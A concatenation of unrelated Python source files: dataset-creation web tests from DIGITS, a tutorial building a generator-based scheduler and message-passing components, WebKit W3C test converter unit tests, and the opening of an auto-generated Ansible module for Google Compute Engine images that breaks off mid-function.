assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMinPerClass(BaseViewsTestWithImageset, test_utils.DatasetMixin):
UNBALANCED_CATEGORY = True
def test_min_per_class(self):
for type in ['train', 'val', 'test']:
yield self.check_min_per_class, type
def check_min_per_class(self, type):
# create dataset, asking for one more image per class
# than available in the "unbalanced" category
min_per_class = self.IMAGE_COUNT / 2 + 1
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_min_per_class'] = min_per_class
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_min_per_class'] = min_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_min_per_class'] = min_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
assert self.categoryCount() == parse_info['label_count'] + 1
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestCreated(BaseViewsTestWithDataset, test_utils.DatasetMixin):
"""
Tests on a dataset that has already been created
"""
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for d in content['datasets']:
if d['id'] == self.dataset_id:
found = True
break
assert found, 'dataset not found in list'
def test_dataset_json(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert content['id'] == self.dataset_id, 'expected different job_id'
def test_mean_dimensions(self):
img_url = '/files/%s/mean.jpg' % self.dataset_id
rv = self.app.get(img_url)
assert rv.status_code == 200, 'GET on %s returned %s' % (img_url, rv.status_code)
buff = StringIO(rv.data)
buff.seek(0)
pil_image = PIL.Image.open(buff)
assert pil_image.size == (self.IMAGE_WIDTH, self.IMAGE_HEIGHT), 'image size is %s' % (pil_image.size,)
def test_edit_name(self):
status = self.edit_job(self.dataset_id,
name='new name'
)
assert status == 200, 'failed with %s' % status
rv = self.app.get('/datasets/summary?job_id=%s' % self.dataset_id)
assert rv.status_code == 200
assert 'new name' in rv.data
def test_edit_notes(self):
status = self.edit_job(
self.dataset_id,
notes='new notes'
)
assert status == 200, 'failed with %s' % status
def test_backend_selection(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['backend'] == self.BACKEND
def test_explore_train(self):
rv = self.app.get('/datasets/images/classification/explore?job_id=%s&db=train' % self.dataset_id)
if self.BACKEND == 'hdf5':
# Not supported yet
assert rv.status_code == 500, 'page load should have failed'
assert 'expected backend is lmdb' in rv.data, 'unexpected page format'
else:
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'Items per page' in rv.data, 'unexpected page format'
def test_explore_val(self):
rv = self.app.get('/datasets/images/classification/explore?job_id=%s&db=val' % self.dataset_id)
if self.BACKEND == 'hdf5':
# Not supported yet
assert rv.status_code == 500, 'page load should have failed'
assert 'expected backend is lmdb' in rv.data, 'unexpected page format'
else:
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'Items per page' in rv.data, 'unexpected page format'
class TestCreatedGrayscale(TestCreated, test_utils.DatasetMixin):
IMAGE_CHANNELS = 1
class TestCreatedWide(TestCreated, test_utils.DatasetMixin):
IMAGE_WIDTH = 20
class TestCreatedTall(TestCreated, test_utils.DatasetMixin):
IMAGE_HEIGHT = 20
class TestCreatedJPEG(TestCreated, test_utils.DatasetMixin):
ENCODING = 'jpg'
class TestCreatedRaw(TestCreated, test_utils.DatasetMixin):
ENCODING = 'none'
class TestCreatedRawGrayscale(TestCreated, test_utils.DatasetMixin):
ENCODING = 'none'
IMAGE_CHANNELS = 1
class TestCreatedHdf5(TestCreated, test_utils.DatasetMixin):
BACKEND = 'hdf5'
def test_compression_method(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['compression'] == self.COMPRESSION
class TestCreatedHdf5Gzip(TestCreatedHdf5, test_utils.DatasetMixin):
COMPRESSION = 'gzip'
|
|
#/--------------------------------------------------------------------------------------------------
#
# Pretty standard fibonacci function
#
#
def fibonacci():
a,b = 1,1
while 1:
print a
a,b = b, a+b
fibonacci()
#
#
#
#
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Generator form
#
#
def fibonacci():
a,b = 1,1
while 1:
yield a # was print a
a,b = b, a+b
g =fibonacci()
print g
print g.next()
print g.next()
print g.next()
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Put the generator into a class
#
class microprocess(object):
def __init__(self):
super(microprocess, self).__init__()
def main(self): #<--- Look its here!!!
yield 1
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Create something to call the generator and manage run queues
#
class scheduler(microprocess):
def __init__(self):
super(scheduler, self).__init__()
self.active = []
self.newqueue = []
def main(self):
for i in xrange(100):
for current in self.active:
yield 1
try:
result = current.next()
if result is not -1:
self.newqueue.append(current)
except StopIteration:
pass
self.active = self.newqueue
self.newqueue = []
def activateMicroprocess(self, someprocess):
microthread = someprocess.main()
self.newqueue.append(microthread)
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Example microprocess, usage and running
#
class printer(microprocess):
def __init__(self, tag):
super(printer, self).__init__()
self.tag = tag
def main(self):
while 1:
yield 1 # Must be a generator
print self.tag
X = printer("Hello World")
Y = printer("Game Over") # Another well known 2 word phrase :-)
myscheduler = scheduler()
myscheduler.activateMicroprocess(X)
myscheduler.activateMicroprocess(Y)
for _ in myscheduler.main():
pass
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Basic Component
#
class component(microprocess):
Boxes = {
"inbox" : "This is where we expect to receive messages",
"outbox" : "This is where we send results/messages"
}
def __init__(self):
super(component, self).__init__()
self.boxes = {}
for box in self.Boxes:
self.boxes[box] = list()
def send(self, value, outboxname):
self.boxes[outboxname].append(value)
def recv(self, inboxname):
result = self.boxes[inboxname][0]
del self.boxes[inboxname][0]
return result
def dataReady(self, inboxname):
return len(self.boxes[inboxname])
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Someone to ensurce deliveries
#
class postman(microprocess):
def __init__(self, source, sourcebox, sink, sinkbox):
self.source = source
self.sourcebox = sourcebox
self.sink = sink
self.sinkbox = sinkbox
def main(self):
while 1:
yield 1
if self.source.dataReady(self.sourcebox):
d = self.source.recv(self.sourcebox)
self.sink.send(d, self.sinkbox)
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Simple Producer/Consumer components & example usage
#
class Producer(component):
def __init__(self, message):
super(Producer, self).__init__()
self.message = message
def main(self):
while 1:
yield 1
self.send(self.message, "outbox")
class Consumer(component):
def main(self):
count = 0
while 1:
yield 1
count += 1 # This is to show our data is changing :-)
if self.dataReady("inbox"):
data = self.recv("inbox")
print data, count
p = Producer("Hello World")
c = Consumer()
postie = postman(p, "outbox", c, "inbox")
myscheduler = scheduler()
myscheduler.activateMicroprocess(p)
myscheduler.activateMicroprocess(c)
myscheduler.activateMicroprocess(postie)
for _ in myscheduler.main():
pass
#
#
#\--------------------------------------------------------------------------------------------------
|
|
#!/usr/bin/env python
# Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import os
import re
import unittest2 as unittest
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.thirdparty.BeautifulSoup import BeautifulSoup
from webkitpy.w3c.test_converter import W3CTestConverter
DUMMY_FILENAME = 'dummy.html'
class W3CTestConverterTest(unittest.TestCase):
def fake_dir_path(self, converter, dirname):
return converter.path_from_webkit_root("LayoutTests", "css", dirname)
def test_read_prefixed_property_list(self):
""" Tests that the current list of properties requiring the -webkit- prefix load correctly """
# FIXME: We should be passing in a MockHost here ...
converter = W3CTestConverter()
prop_list = converter.prefixed_properties
self.assertTrue(prop_list, 'No prefixed properties found')
for prop in prop_list:
self.assertTrue(prop.startswith('-webkit-'))
def test_convert_for_webkit_nothing_to_convert(self):
""" Tests convert_for_webkit() using a basic test that has nothing to convert """
test_html = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CSS Test: DESCRIPTION OF TEST</title>
<link rel="author" title="NAME_OF_AUTHOR"
href="mailto:EMAIL OR http://CONTACT_PAGE"/>
<link rel="help" href="RELEVANT_SPEC_SECTION"/>
<meta name="assert" content="TEST ASSERTION"/>
<style type="text/css"><![CDATA[
CSS FOR TEST
]]></style>
</head>
<body>
CONTENT OF TEST
</body>
</html>
"""
converter = W3CTestConverter()
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_html('/nothing/to/convert', test_html, DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_no_conversion_happened(converted)
def test_convert_for_webkit_harness_only(self):
""" Tests convert_for_webkit() using a basic JS test that uses testharness.js only and has no prefixed properties """
test_html = """<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
</head>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, "harnessonly")
converted = converter.convert_html(fake_dir_path, test_html, DUMMY_FILENAME)
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, converted[1], fake_dir_path, 1, 1)
self.verify_prefixed_properties(converted, [])
def test_convert_for_webkit_properties_only(self):
""" Tests convert_for_webkit() using a test that has 2 prefixed properties: 1 in a style block + 1 inline style """
test_html = """<html>
<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
<style type="text/css">
#block1 { @test0@: propvalue; }
</style>
</head>
<body>
<div id="elem1" style="@test1@: propvalue;"></div>
</body>
</html>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, 'harnessandprops')
test_content = self.generate_test_content(converter.prefixed_properties, 1, test_html)
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_html(fake_dir_path, test_content[1], DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, converted[1], fake_dir_path, 1, 1)
self.verify_prefixed_properties(converted, test_content[0])
def test_convert_for_webkit_harness_and_properties(self):
""" Tests convert_for_webkit() using a basic JS test that uses testharness.js and testharness.css and has 4 prefixed properties: 3 in a style block + 1 inline style """
test_html = """<html>
<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
<style type="text/css">
#block1 { @test0@: propvalue; }
#block2 { @test1@: propvalue; }
#block3 { @test2@: propvalue; }
</style>
</head>
<body>
<div id="elem1" style="@test3@: propvalue;"></div>
</body>
</html>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, 'harnessandprops')
oc = OutputCapture()
oc.capture_output()
try:
test_content = self.generate_test_content(converter.prefixed_properties, 2, test_html)
converted = converter.convert_html(fake_dir_path, test_content[1], DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, converted[1], fake_dir_path, 1, 1)
self.verify_prefixed_properties(converted, test_content[0])
def test_convert_test_harness_paths(self):
""" Tests convert_testharness_paths() with a test that uses all three testharness files """
test_html = """<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
</head>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, 'testharnesspaths')
doc = BeautifulSoup(test_html)
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_testharness_paths(doc, fake_dir_path, DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, doc, fake_dir_path, 2, 1)
def test_convert_prefixed_properties(self):
""" Tests convert_prefixed_properties() file that has 20 properties requiring the -webkit- prefix:
10 in one style block + 5 in another style
block + 5 inline styles, including one with multiple prefixed properties.
The properties in the test content are in all sorts of wack formatting.
"""
test_html = """<html>
<style type="text/css"><![CDATA[
.block1 {
width: 300px;
height: 300px
}
.block2 {
@test0@: propvalue;
}
.block3{@test1@: propvalue;}
.block4 { @test2@:propvalue; }
.block5{ @test3@ :propvalue; }
#block6 { @test4@ : propvalue; }
#block7
{
@test5@: propvalue;
}
#block8 { @test6@: propvalue; }
#block9:pseudo
{
@test7@: propvalue;
@test8@: propvalue propvalue propvalue;;
}
]]></style>
</head>
<body>
<div id="elem1" style="@test9@: propvalue;"></div>
<div id="elem2" style="propname: propvalue; @test10@ : propvalue; propname:propvalue;"></div>
<div id="elem2" style="@test11@: propvalue; @test12@ : propvalue; @test13@ :propvalue;"></div>
<div id="elem3" style="@test14@:propvalue"></div>
</body>
<style type="text/css"><![CDATA[
.block10{ @test15@: propvalue; }
.block11{ @test16@: propvalue; }
.block12{ @test17@: propvalue; }
#block13:pseudo
{
@test18@: propvalue;
@test19@: propvalue;
}
]]></style>
</html>
"""
converter = W3CTestConverter()
test_content = self.generate_test_content(converter.prefixed_properties, 20, test_html)
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_prefixed_properties(BeautifulSoup(test_content[1]), DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_prefixed_properties(converted, test_content[0])
def verify_conversion_happened(self, converted):
self.assertTrue(converted, "conversion didn't happen")
def verify_no_conversion_happened(self, converted):
self.assertEqual(converted, None, 'test should not have been converted')
def verify_test_harness_paths(self, converter, converted, test_path, num_src_paths, num_href_paths):
if isinstance(converted, basestring):
converted = BeautifulSoup(converted)
resources_dir = converter.path_from_webkit_root("LayoutTests", "resources")
# Verify the original paths are gone, and the new paths are present.
orig_path_pattern = re.compile('\"/resources/testharness')
self.assertEquals(len(converted.findAll(src=orig_path_pattern)), 0, 'testharness src path was not converted')
self.assertEquals(len(converted.findAll(href=orig_path_pattern)), 0, 'testharness href path was not converted')
new_relpath = os.path.relpath(resources_dir, test_path)
relpath_pattern = re.compile(new_relpath)
self.assertEquals(len(converted.findAll(src=relpath_pattern)), num_src_paths, 'testharness src relative path not correct')
self.assertEquals(len(converted.findAll(href=relpath_pattern)), num_href_paths, 'testharness href relative path not correct')
def verify_prefixed_properties(self, converted, test_properties):
self.assertEqual(len(converted[0]), len(test_properties), 'Incorrect number of properties converted')
for test_prop in test_properties:
self.assertTrue((test_prop in converted[1]), 'Property ' + test_prop + ' not found in converted doc')
def generate_test_content(self, full_property_list, num_test_properties, html):
"""Inserts properties requiring a -webkit- prefix into the content, replacing \'@testXX@\' with a property."""
test_properties = []
count = 0
while count < num_test_properties:
test_properties.append(full_property_list[count])
count += 1
# Replace the tokens in the testhtml with the test properties. Walk backward
# through the list to replace the double-digit tokens first
index = len(test_properties) - 1
while index >= 0:
# Use the unprefixed version
test_prop = test_properties[index].replace('-webkit-', '')
# Replace the token
html = html.replace('@test' + str(index) + '@', test_prop)
index -= 1
return (test_properties, html)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_image
description:
- Represents an Image resource.
- Google Compute Engine uses operating system images to create the root persistent
disks for your instances. You specify an image when you create an instance. Images
contain a boot loader, an operating system, and a root file system. Linux operating
system images are also capable of running containers on Compute Engine.
- Images can be either public or custom.
- Public images are provided and maintained by Google, open-source communities, and
third-party vendors. By default, all projects have access to these images and can
use them to create instances. Custom images are available only to your project.
You can create a custom image from root persistent disks and other images. Then,
use the custom image to create an instance.
short_description: Creates a GCP Image
version_added: '2.6'
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
required: false
type: str
disk_size_gb:
description:
- Size of the image when restored onto a persistent disk (in GB).
required: false
type: int
family:
description:
- The name of the image family to which this image belongs. You can create disks
by specifying an image family instead of a specific image name. The image family
always returns its latest image that is not deprecated. The name of the image
family must comply with RFC1035.
required: false
type: str
guest_os_features:
description:
- A list of features to enable on the guest operating system.
- Applicable only for bootable images.
required: false
type: list
suboptions:
type:
description:
- The type of supported feature.
- 'Some valid choices include: "MULTI_IP_SUBNET", "SECURE_BOOT", "UEFI_COMPATIBLE",
"VIRTIO_SCSI_MULTIQUEUE", "WINDOWS"'
required: false
type: str
image_encryption_key:
description:
- Encrypts the image using a customer-supplied encryption key.
- After you encrypt an image with a customer-supplied key, you must provide the
same key if you use the image later (e.g. to create a disk from the image) .
required: false
type: dict
suboptions:
raw_key:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
required: false
type: str
labels:
description:
- Labels to apply to this Image.
required: false
type: dict
version_added: '2.8'
licenses:
description:
- Any applicable license URI.
required: false
type: list
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
type: str
raw_disk:
description:
- The parameters of the raw disk image.
required: false
type: dict
suboptions:
container_type:
description:
- The format used to encode and transmit the block device, which should be
TAR. This is just a container and transmission format and not a runtime
format. Provided by the client when the disk image is created.
- 'Some valid choices include: "TAR"'
required: false
type: str
sha1_checksum:
description:
- An optional SHA1 checksum of the disk image before unpackaging.
- This is provided by the client when the disk image is created.
required: false
type: str
source:
description:
- The full Google Cloud Storage URL where disk storage is stored You must
provide either this property or the sourceDisk property but not both.
required: true
type: str
source_disk:
description:
- The source disk to create this image based on.
- You must provide either this property or the rawDisk.source property but not
both to create an image.
- 'This field represents a link to a Disk resource in GCP. It can be specified
in two ways. First, you can place a dictionary with key ''selfLink'' and value
of your resource''s selfLink Alternatively, you can add `register: name-of-resource`
to a gcp_compute_disk task and then set this source_disk field to "{{ name-of-resource
}}"'
required: false
type: dict
source_disk_encryption_key:
description:
- The customer-supplied encryption key of the source disk. Required if the source
disk is protected by a customer-supplied encryption key.
required: false
type: dict
suboptions:
raw_key:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
required: false
type: str
source_disk_id:
description:
- The ID value of the disk used to create this image. This value may be used to
determine whether the image was taken from the current or a previous instance
of a given disk name.
required: false
type: str
source_type:
description:
- The type of the image used to create this disk. The default and only value is
RAW .
- 'Some valid choices include: "RAW"'
required: false
type: str
project:
description:
- The Google Cloud Platform project to use.
type: str
auth_kind:
description:
- The type of credential used.
type: str
required: true
choices:
- application
- machineaccount
- serviceaccount
service_account_contents:
description:
- The contents of a Service Account JSON file, either in a dictionary or as a
JSON string that represents it.
type: jsonarg
service_account_file:
description:
- The path of a Service Account JSON file if serviceaccount is selected as type.
type: path
service_account_email:
description:
- An optional service account email address if machineaccount is selected and
the user does not wish to use the default email.
type: str
scopes:
description:
- Array of scopes to be used
type: list
env_type:
description:
- Specifies which Ansible environment you're running this module within.
- This should not be set unless you know what you're doing.
- This only alters the User Agent string for any API requests.
type: str
notes:
- 'API Reference: U(https://cloud.google.com/compute/docs/reference/v1/images)'
- 'Official Documentation: U(https://cloud.google.com/compute/docs/images)'
- for authentication, you can set service_account_file using the c(gcp_service_account_file)
env variable.
- for authentication, you can set service_account_contents using the c(GCP_SERVICE_ACCOUNT_CONTENTS)
env variable.
- For authentication, you can set service_account_email using the C(GCP_SERVICE_ACCOUNT_EMAIL)
env variable.
- For authentication, you can set auth_kind using the C(GCP_AUTH_KIND) env variable.
- For authentication, you can set scopes using the C(GCP_SCOPES) env variable.
- Environment variables values will only be used if the playbook values are not set.
- The I(service_account_email) and I(service_account_file) options are mutually exclusive.
'''
EXAMPLES = '''
- name: create a disk
gcp_compute_disk:
name: disk-image
zone: us-central1-a
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: disk
- name: create a image
gcp_compute_image:
name: test_object
source_disk: "{{ disk }}"
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
archiveSizeBytes:
description:
- Size of the image tar.gz archive stored in Google Cloud Storage (in bytes).
returned: success
type: int
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
deprecated:
description:
- The deprecation status associated with this image.
returned: success
type: complex
contains:
deleted:
description:
- An optional RFC3339 timestamp on or after which the state of this resource
is intended to change to DELETED. This is only informational and the status
will not change unless the client explicitly changes it.
returned: success
type: str
deprecated:
description:
- An optional RFC3339 timestamp on or after which the state of this resource
is intended to change to DEPRECATED. This is only informational and the status
will not change unless the client explicitly changes it.
returned: success
type: str
obsolete:
description:
- An optional RFC3339 timestamp on or after which the state of this resource
is intended to change to OBSOLETE. This is only informational and the status
will not change unless the client explicitly changes it.
returned: success
type: str
replacement:
description:
- The URL of the suggested replacement for a deprecated resource.
- The suggested replacement resource must be the same kind of resource as the
deprecated resource.
returned: success
type: str
state:
description:
- The deprecation state of this resource. This can be DEPRECATED, OBSOLETE,
or DELETED. Operations which create a new resource using a DEPRECATED resource
will return successfully, but with a warning indicating the deprecated resource
and recommending its replacement. Operations which use OBSOLETE or DELETED
resources will be rejected and result in an error.
returned: success
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
diskSizeGb:
description:
- Size of the image when restored onto a persistent disk (in GB).
returned: success
type: int
family:
description:
- The name of the image family to which this image belongs. You can create disks
by specifying an image family instead of a specific image name. The image family
always returns its latest image that is not deprecated. The name of the image
family must comply with RFC1035.
returned: success
type: str
guestOsFeatures:
description:
- A list of features to enable on the guest operating system.
- Applicable only for bootable images.
returned: success
type: complex
contains:
type:
description:
- The type of supported feature.
returned: success
type: str
id:
description:
- The unique identifier for the resource. This identifier is defined by the server.
returned: success
type: int
imageEncryptionKey:
description:
- Encrypts the image using a customer-supplied encryption key.
- After you encrypt an image with a customer-supplied key, you must provide the
same key if you use the image later (e.g. to create a disk from the image) .
returned: success
type: complex
contains:
rawKey:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
returned: success
type: str
sha256:
description:
- The RFC 4648 base64 encoded SHA-256 hash of the customer-supplied encryption
key that protects this resource.
returned: success
type: str
labels:
description:
- Labels to apply to this Image.
returned: success
type: dict
labelFingerprint:
description:
- The fingerprint used for optimistic locking of this resource. Used internally
during updates.
returned: success
type: str
licenses:
description:
- Any applicable license URI.
returned: success
type: list
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
rawDisk:
description:
- The parameters of the raw disk image.
returned: success
type: complex
contains:
containerType:
description:
- The format used to encode and transmit the block device, which should be TAR.
This is just a container and transmission format and not a runtime format.
Provided by the client when the disk image is created.
returned: success
type: str
sha1Checksum:
description:
- An optional SHA1 checksum of the disk image before unpackaging.
- This is provided by the client when the disk image is created.
returned: success
type: str
source:
description:
- The full Google Cloud Storage URL where disk storage is stored You must provide
either this property or the sourceDisk property but not both.
returned: success
type: str
sourceDisk:
description:
- The source disk to create this image based on.
- You must provide either this property or the rawDisk.source property but not both
to create an image.
returned: success
type: dict
sourceDiskEncryptionKey:
description:
- The customer-supplied encryption key of the source disk. Required if the source
disk is protected by a customer-supplied encryption key.
returned: success
type: complex
contains:
rawKey:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
returned: success
type: str
sha256:
description:
- The RFC 4648 base64 encoded SHA-256 hash of the customer-supplied encryption
key that protects this resource.
returned: success
type: str
sourceDiskId:
description:
- The ID value of the disk used to create this image. This value may be used to
determine whether the image was taken from the current or a previous instance
of a given disk name.
returned: success
type: str
sourceType:
description:
- The type of the image used to create this disk. The default and only value is
RAW .
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import re
import time
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
description=dict(type='str'),
disk_size_gb=dict(type='int'),
family=dict(type='str'),
guest_os_features=dict(type='list', elements='dict', options=dict(type=dict(type='str'))),
image_encryption_key=dict(type='dict', options=dict(raw_key=dict(type='str'))),
labels=dict(type='dict'),
licenses=dict(type='list', elements='str'),
name=dict(required=True, type='str'),
raw_disk=dict(type='dict', options=dict(container_type=dict(type='str'), sha1_checksum=dict(type='str'), source=dict(required=True, type='str'))),
source_disk=dict(type='dict'),
source_disk_encryption_key=dict(type='dict', options=dict(raw_key=dict(type='str'))),
source_disk_id=dict(type='str'),
source_type=dict(type='str'),
)
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
state = module.params['state']
kind = 'compute#image'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module), kind, fetch)
fetch = fetch_resource(module, self_link(module), kind)
changed = True
else:
delete(module, self_link(module), kind)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind, fetch):
update_fields(module, resource_to_request(module), response_to_hash(module, fetch))
return fetch_resource(module, self_link(module), kind)
def update_fields(module, request, response):
if response.get('labels') != request.get('labels'):
labels_update(module, request, response)
def labels_update(module, request, response):
auth = GcpSession(module, 'compute')
auth.post(
''.join(["https://www.googleapis.com/compute/v1/", "projects/{project}/global/images/{name}/setLabels"]).format(**module.params),
{u'labels': module.params.get('labels'), u'labelFingerprint': response.get('labelFingerprint')},
)
def delete(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#image',
u'description': module.params.get('description'),
u'diskSizeGb': module.params.get('disk_size_gb'),
u'family': module.params.get('family'),
u'guestOsFeatures': ImageGuestosfeaturesArray(module.params.get('guest_os_features', []), module).to_request(),
u'imageEncryptionKey': ImageImageencryptionkey(module.params.get('image_encryption_key', {}), module).to_request(),
u'labels': module.params.get('labels'),
u'licenses': module.params.get('licenses'),
u'name': module.params.get('name'),
u'rawDisk': ImageRawdisk(module.params.get('raw_disk', {}), module).to_request(),
u'sourceDisk': replace_resource_dict(module.params.get(u'source_disk', {}), 'selfLink'),
